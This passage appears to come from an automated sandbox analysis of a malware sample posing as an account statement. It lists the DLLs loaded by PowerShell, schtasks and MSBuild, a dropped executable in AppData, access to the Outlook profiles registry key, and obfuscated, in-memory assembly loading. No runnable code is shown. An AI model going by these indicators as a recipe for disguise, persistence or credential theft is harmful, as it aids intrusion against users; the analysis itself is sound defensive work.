                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: zzUBZ.pdb source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr
                    Source: Binary string: zzUBZ.pdbSHA256 source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: TgfQNrhQjjseHY.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.cs.Net Code: OI5QjapQfoSucKdLSo9 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.cs.Net Code: OI5QjapQfoSucKdLSo9 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.cs.Net Code: OI5QjapQfoSucKdLSo9 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.5910000.4.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeCode function: 0_2_0186D89E pushfd ; ret 0_2_0186D8A1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0690E998 push eax; retf 8_2_0690E9A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00C90C23 push edi; retf 13_2_00C90CAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00C9DA24 push ecx; ret 13_2_00C9DA26
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exeStatic PE information: section name: .text entropy: 7.318017102591194
                    Source: TgfQNrhQjjseHY.exe.0.drStatic PE information: section name: .text entropy: 7.318017102591194
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, UXUW0udg70mIAfO19dm.csHigh entropy of concatenated method names: 'hGObYYROs1', 'w5bb8LoxpS', 'reKbDoRtHP', 'gyhbL0KaHv', 'YGtb7gommS', 'l6Qb5qGElQ', 'oXKbu0b469', 'GTbbVHLNMa', 'oT5bWslBUD', 'yV5b98lPrs'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, XUlWngz4TlbqdVkh6V.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XvLbwHlMxj', 'JO9bt0hiNZ', 'FmsbCP8562', 'iIVbr355kJ', 'vUtbAHuBDF', 'KGZbbnZ1TS', 'bH7bj41635'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, nPiq9cdZ7nsxoOEVMFR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VfjjipJ5jB', 'ecNjcBEFjE', 'hMsjU0XmWl', 'mc7jBjno3X', 'hDEjlyeiyp', 'EXSjHKyttM', 'QRPjNo9sHc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, ktPfB7FoodvjaClP45.csHigh entropy of concatenated method names: 'GYbwVdBgV0', 'ct9wWhPHWH', 'UCAwmZr14q', 'oW7wI1myv2', 'gPwwh8v6VZ', 'iw6wOWQEhP', 'uqvwsXyeS1', 'hgYwohn3BM', 'PhGw4Z3TXV', 'kPfwpbsgF5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, fx1x6XkTFKYRc4eMtM.csHigh entropy of concatenated method names: 'tu6dQKKRJ8', 'iFXdS4G1N1', 'HSod1fDuDj', 'vvkd0J15nH', 'eEkdtorRPL', 'B1ndC2ZUap', 'eVTAmoTbuceFLwfp9k', 'EP1cPMVxG4ouBRJqQr', 'NoLddbb0nY', 'paRdZPMMqc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.csHigh entropy of concatenated method names: 'OHCZEoGYXS', 'za6ZRUp1NC', 'LsfZfihH1x', 'PmqZeCABxg', 'fZBZnFtRZu', 'KgrZT24DKc', 'pdoZQDbKqR', 'HaiZSDAeXH', 'rtCZP9aj4v', 'se1Z14RjhC'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, fPL71nm2ZUapu9jmZJ.csHigh entropy of concatenated method names: 'ibhTE7WPuU', 'ayaTf2Vb8l', 'utZTn2rtoy', 'C1hTQ5Q3o8', 'kfiTSM9SbK', 'Hrinllo2QW', 'twYnHSf6EQ', 'vgmnN3BD0A', 'YaTnvVftcJ', 'FGRn35nXKu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, YM2o09BF5gx5L68j9x.csHigh entropy of concatenated method names: 'Puyr1SEOgw', 'jAWr0KQonX', 'ToString', 'GWmrRgEXER', 'mNZrfxJ7SI', 'QYlreBDUKc', 'mxxrnITVgY', 'rPPrTjJ5XC', 'thArQwQQ0J', 'eiVrSx1TM5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, KYivPAvbBoJxPUPiA2.csHigh entropy of concatenated method names: 'ChcAR844sb', 'AqdAf7XApc', 'RMpAeoWPSD', 'fWxAnQoZrk', 'xOGAThLATv', 'HwbAQ8VVH2', 'cxIASGDdpG', 'TiJAPTrgTP', 'kkLA1FCnqZ', 'h4eA0ohWfu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, xKKRJ8VTFX4G1N1xGX.csHigh entropy of concatenated method names: 'D3dfiKS5Sp', 'rMefcvvbZK', 'SpffU7HpJA', 'Y3nfB1h5XH', 'NYFflbvhV9', 'DYCfHO444e', 'Ro7fNWUTix', 'B7nfvBrXKx', 'PPSf3hYOWA', 'SjmfJ9OJLq'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, ejlP3Oxj5VTYEvKO5r.csHigh entropy of concatenated method names: 'tZHDsgf5V', 'TqHL6fWn1', 'n4r5VkwwE', 'lcMunrfq2', 'RVYWKd0XW', 'lBY9qKXYe', 'Fx4iZHZBZDR5q6wj5U', 'hTgejTfqLGN7KQHyDI', 'MMDA6kDcf', 'DYEjtPCgx'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, TmNAWqstqFSpLbNpTE.csHigh entropy of concatenated method names: 'pyQQRlBiSp', 'E0vQe21bOq', 'McCQTqJuBH', 'yINTJekOsy', 'vY5TzynDHT', 'zAXQgYfYec', 'LR2QdtQDri', 'w0fQxrxcPL', 'mdVQZ4CeYY', 'xkXQkqk348'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, mFN8l0JlMCpR0cYUUm.csHigh entropy of concatenated method names: 'j0YbdHxUEM', 'yLAbZuoTT0', 'CmEbkWkI0T', 'VRqbRdmdvV', 'JjnbfoL9XJ', 'CW1bng2scv', 'DYFbTRNnyh', 'EpWANXpBum', 'MbQAvxSBmE', 'DPWA3vI2hG'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, kR0DFf3CmMYrZsqb6N.csHigh entropy of concatenated method names: 'PsbAmTPdsH', 'UL4AI1KolP', 'zZFAMYgyW4', 'Un6AhXQrVl', 'YZfAicwbo0', 'MkBAOySJCH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, mHKiENejJDcn6AxJbF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CMfx300hPc', 'nkTxJ5PJPg', 'ogsxz1YYcH', 'b1BZgjYLca', 'GFCZdvwC4f', 'C9EZx9j4Aj', 'JcAZZ1cK44', 'qgRnKrpWhesTAI9XFDB'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, yUquE6UMuMSijVwDGu.csHigh entropy of concatenated method names: 'ToString', 'wjeCp9TOsm', 'elwCIZR1jG', 'XLrCM6Or2t', 'B52ChAV4fs', 'Hc7COidv4y', 'r2mCqbdbRk', 'jrwCslyeRR', 'J30Co2JPTW', 'XT5C29RNwW'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, RgfDrXHKnC8jGFqB26.csHigh entropy of concatenated method names: 'UIirv4wQPb', 'W3JrJPpmbb', 'apDAg4jARg', 'rt9AdpI2cx', 'uOFrpJ8Ou2', 'UmZraxJtnF', 'jNqrF5QNWn', 'CVBriPBh2v', 'sQWrcW8ea3', 'VtorU1OQPw'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, T82yWMWSofDuDjyvkJ.csHigh entropy of concatenated method names: 'cH3eLV49E6', 'vTte5vCLHs', 'oYveVjVGRW', 'GTWeWhVeBq', 'hb4etnE68T', 'JZfeCR7GNq', 'g2nerLuvOO', 'bSyeAkjplI', 'RiiebyLH3g', 'yv2ejuWm7c'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, f9UIpU26JvmBTBSctL.csHigh entropy of concatenated method names: 'vfHQYG4MDd', 'lxLQ80Eh3u', 'QJwQDjcDQV', 'RsSQLbiuv5', 'XTdQ7qxngP', 'JvcQ5uSdXS', 'aL5QucoJJX', 'RgDQVmDUTR', 'aucQWNTHuO', 'qASQ96w7M7'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, G4wV8Gf6v2K5jjGjCT.csHigh entropy of concatenated method names: 'Dispose', 'EHid3gFA4w', 'JonxInLaGY', 'MbkXXgYQPF', 'fqYdJivPAb', 'ToJdzxPUPi', 'ProcessDialogKey', 'r2SxgR0DFf', 'pmMxdYrZsq', 'r6Nxx0FN8l'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, TeEwg8iN7vW6LLxRRW.csHigh entropy of concatenated method names: 'hOqt4bLcLD', 'qRutaW7Rmk', 'JvOtiQ1wuX', 'DcZtcWNJdC', 'fnmtIY1ulX', 'xZTtMtD2ll', 'WuCthA6ndI', 'CuCtOQdDiY', 'aRHtqNsKQm', 'zZBtsruW67'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, KVbeayhXmtlCZ27r6N.csHigh entropy of concatenated method names: 'i3FT6EgOZd', 'L0fTYU60io', 'O7ETDqlVyd', 'Yq1TLMDMZA', 'y5HT5YVhCu', 'VlKTu3RKje', 'H9lTWInGs8', 'DR2T9rw2JC', 'v12g6V4xk1vhjN1Ug52', 'bKrGdL4boFxp9Sou1KN'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, UXUW0udg70mIAfO19dm.csHigh entropy of concatenated method names: 'hGObYYROs1', 'w5bb8LoxpS', 'reKbDoRtHP', 'gyhbL0KaHv', 'YGtb7gommS', 'l6Qb5qGElQ', 'oXKbu0b469', 'GTbbVHLNMa', 'oT5bWslBUD', 'yV5b98lPrs'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, XUlWngz4TlbqdVkh6V.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XvLbwHlMxj', 'JO9bt0hiNZ', 'FmsbCP8562', 'iIVbr355kJ', 'vUtbAHuBDF', 'KGZbbnZ1TS', 'bH7bj41635'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, nPiq9cdZ7nsxoOEVMFR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VfjjipJ5jB', 'ecNjcBEFjE', 'hMsjU0XmWl', 'mc7jBjno3X', 'hDEjlyeiyp', 'EXSjHKyttM', 'QRPjNo9sHc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, ktPfB7FoodvjaClP45.csHigh entropy of concatenated method names: 'GYbwVdBgV0', 'ct9wWhPHWH', 'UCAwmZr14q', 'oW7wI1myv2', 'gPwwh8v6VZ', 'iw6wOWQEhP', 'uqvwsXyeS1', 'hgYwohn3BM', 'PhGw4Z3TXV', 'kPfwpbsgF5'
